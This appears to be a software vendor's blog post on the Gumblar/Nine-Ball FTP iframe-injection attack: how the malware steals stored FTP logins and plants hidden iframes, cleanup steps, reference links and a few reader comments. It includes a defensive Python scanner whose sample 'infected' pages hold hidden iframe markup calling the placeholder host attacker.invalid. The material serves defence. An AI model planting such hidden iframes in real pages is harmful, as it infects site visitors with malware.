Nine-Ball/Gumblar/iFrame/FTP Attack
For the sake of both PDG merchants and others who might be searching for information on this attack, we wanted to provide some information regarding a recent “iframe” hack/attack that has affected some PDG merchants. This attack appears to be the result of local computers that have been compromised by a virus/malware program. The local virus locates stored user ID and password information on the local computer and then connects via FTP to the site. Once connected, the program attempts to locate all files that have “index”, “main”, “default” or “home” in the file name (standard file names for most websites’ home pages). Once it locates these files, it inserts a hidden iframe into the page so that subsequent visitors to the page are also infected with a virus/malware program.
Unfortunately, some of the PDG Commerce administration templates do have “main” in the file name. Fortunately, though, since PDG Commerce checks the admin templates for unauthorized changes, PDG Commerce refuses to load the template and informs the user that the code within the template has been changed.
When we were first notified of the problem, we assisted one of our customers in confirming via their host’s FTP logs that the files were compromised via an FTP session with “authenticated” access. We have confirmed with several of our hosting partners that this attack appears to be affecting numerous users and does not in any way appear to be specific to PDG Commerce users.
We’ve provided some links below to articles/blogs/alerts that we encountered during the course of our research that detail both how the attacks occurred and what steps users can take to remove the offending malware and prevent the attack from happening again. The general consensus appears to be that the best steps are: a) removing the hidden iframe from all affected pages (the hidden <div> that contains the iframe); b) running a full system scan with current anti-virus software on the offending machine; c) changing all user ID and password information associated with the hosting account; and d) converting to the use of SFTP (secure FTP, where all login information and other data sent through the connection is encrypted). The most immediate step should be changing your hosting account/FTP login info, but bear in mind that until the offending program is removed from the local computer, it will continue to harvest your updated FTP account information and re-infect the files on your server.
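To help with step a), the following scanner is an added example (not PDG Software’s code and not part of the original post). It walks a site directory, picks out files whose names contain the fragments the post says the malware targets, and reports any iframe that is hidden either by its own attributes/style or by a wrapping <div style="display:none">. The sample pages and the host name attacker.invalid are constructed placeholders, not real indicators; the file extensions it reads and the hidden-element patterns are assumptions.

```python
"""Scan web pages for a hidden-iframe injection of the kind described in the post.

Added example, not PDG Software's code.  Assumed: the malware edits files whose names
contain "index", "main", "default" or "home" and inserts an iframe hidden either by its
own attributes/style or by a parent <div> styled display:none / visibility:hidden.
"""
import os
import re

# File-name fragments the post says the malware looks for.
TARGET_NAME_FRAGMENTS = ("index", "main", "default", "home")

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)

# Ways an iframe hides itself: CSS display/visibility, or zero width/height
# as an attribute or inline CSS (the lookahead rejects 0.5, 0%, 05 and so on).
HIDDEN_RE = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"""|\b(?:width|height)\s*=\s*["']?0(?:px)?(?![\w.%])"""
    r"|\b(?:width|height)\s*:\s*0(?:px)?(?![\w.%])",
    re.IGNORECASE,
)

# A hidden wrapper <div ...>...</div>.  Non-greedy up to the first </div>, which is
# enough for the flat injected wrapper; nested <div>s inside it are not handled.
HIDDEN_DIV_RE = re.compile(
    r"""<div\b[^>]*style\s*=\s*["'][^"']*(?:display\s*:\s*none|visibility\s*:\s*hidden)"""
    r"""[^"']*["'][^>]*>.*?</div>""",
    re.IGNORECASE | re.DOTALL,
)


def is_candidate_filename(path):
    """True if the base file name matches what the post says the malware targets."""
    lower = os.path.basename(path).lower()
    return any(fragment in lower for fragment in TARGET_NAME_FRAGMENTS)


def find_hidden_iframes(html):
    """Return one dict per iframe that is hidden directly or by a hidden parent <div>."""
    hidden_spans = [(m.start(), m.end()) for m in HIDDEN_DIV_RE.finditer(html)]
    hits = []
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0)
        if HIDDEN_RE.search(tag):
            reason = "iframe hidden by its own attributes/style"
        elif any(start <= m.start() < end for start, end in hidden_spans):
            reason = "iframe inside a hidden <div>"
        else:
            continue  # a visible iframe (e.g. a legitimate embedded widget)
        src = SRC_RE.search(tag)
        hits.append({"offset": m.start(), "src": src.group(1) if src else None, "reason": reason})
    return hits


def scan_files(files, only_candidates=True):
    """files: iterable of (path, html_text).  Returns {path: hits} for files with hits.

    only_candidates=False checks every file, for the final sweep of non-PDG files
    that the post recommends.
    """
    report = {}
    for path, html in files:
        if only_candidates and not is_candidate_filename(path):
            continue
        hits = find_hidden_iframes(html)
        if hits:
            report[path] = hits
    return report


def iter_tree(root, extensions=(".html", ".htm", ".php", ".tpl")):
    """Yield (path, text) for template/page files under root; unreadable files are skipped."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        yield path, fh.read()
                except OSError:
                    continue


# Constructed sample pages; attacker.invalid is a placeholder, not a real indicator.
CLEAN_PAGE = (
    "<html><body><h1>Welcome</h1>\n"
    '<iframe src="https://example.com/widget" width="300" height="200"></iframe>\n'
    "</body></html>\n"
)
INFECTED_PAGE = (
    "<html><body><h1>Welcome</h1>\n"
    '<div style="display:none"><iframe src="http://attacker.invalid/in.php" '
    'width="1" height="1"></iframe></div>\n'
    '<iframe src="http://attacker.invalid/x.php" width="0" height="0" '
    'style="visibility:hidden"></iframe>\n'
    "</body></html>\n"
)
SAMPLE_SITE = [
    ("htdocs/index.html", INFECTED_PAGE),
    ("htdocs/about.html", INFECTED_PAGE),  # skipped by name unless only_candidates=False
    ("htdocs/main.tpl", CLEAN_PAGE),
]

if __name__ == "__main__":
    import sys
    files = iter_tree(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_SITE
    for path, hits in scan_files(files, only_candidates=False).items():
        for hit in hits:
            print(f"{path}: offset {hit['offset']}: {hit['reason']} -> src={hit['src']}")
```

Run it with your web root as the argument (`python scan_iframes.py /path/to/htdocs`); with no argument it scans the constructed sample site. It only reports, so you can review each hit before removing the injected markup, and a clean run after the upgrade confirms the server copy is back to normal.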
http://securitylabs.websense.com/content/Blogs/3422.aspx
http://directadmin.com/forum/showthread.php?p=159176
http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
http://blog.tigertech.net/posts/ftp-virus-spreading/
http://www.spamfighter.com/News-12579-Security-Experts-Identify-Causes-Of-Gumblar-Attack.htm
And even a post from one of our competitor’s forums… http://www.magentocommerce.com/boards/viewthread/41070/
Users may download the most recent AdminTemplates and CommConfig directories from the PDG Software website at http://download.pdgsoft.com/download/PDG_Commerce/Upgrade/ . Once you have located the correct download for your server’s operating system, you can proceed with upgrading your PDG Commerce installation. The upgrade process will restore all PDG files that might have been affected by the iframe attack. It is important to note, though, that you will also need to check any and all non-PDG files to confirm that the program did not inject itself into other files located on your server.
[...] This post was Twitted by Gumblar [...]
you got some good points….
ftp security…
I can’t believe I missed this! I’m going to have to do some more reading….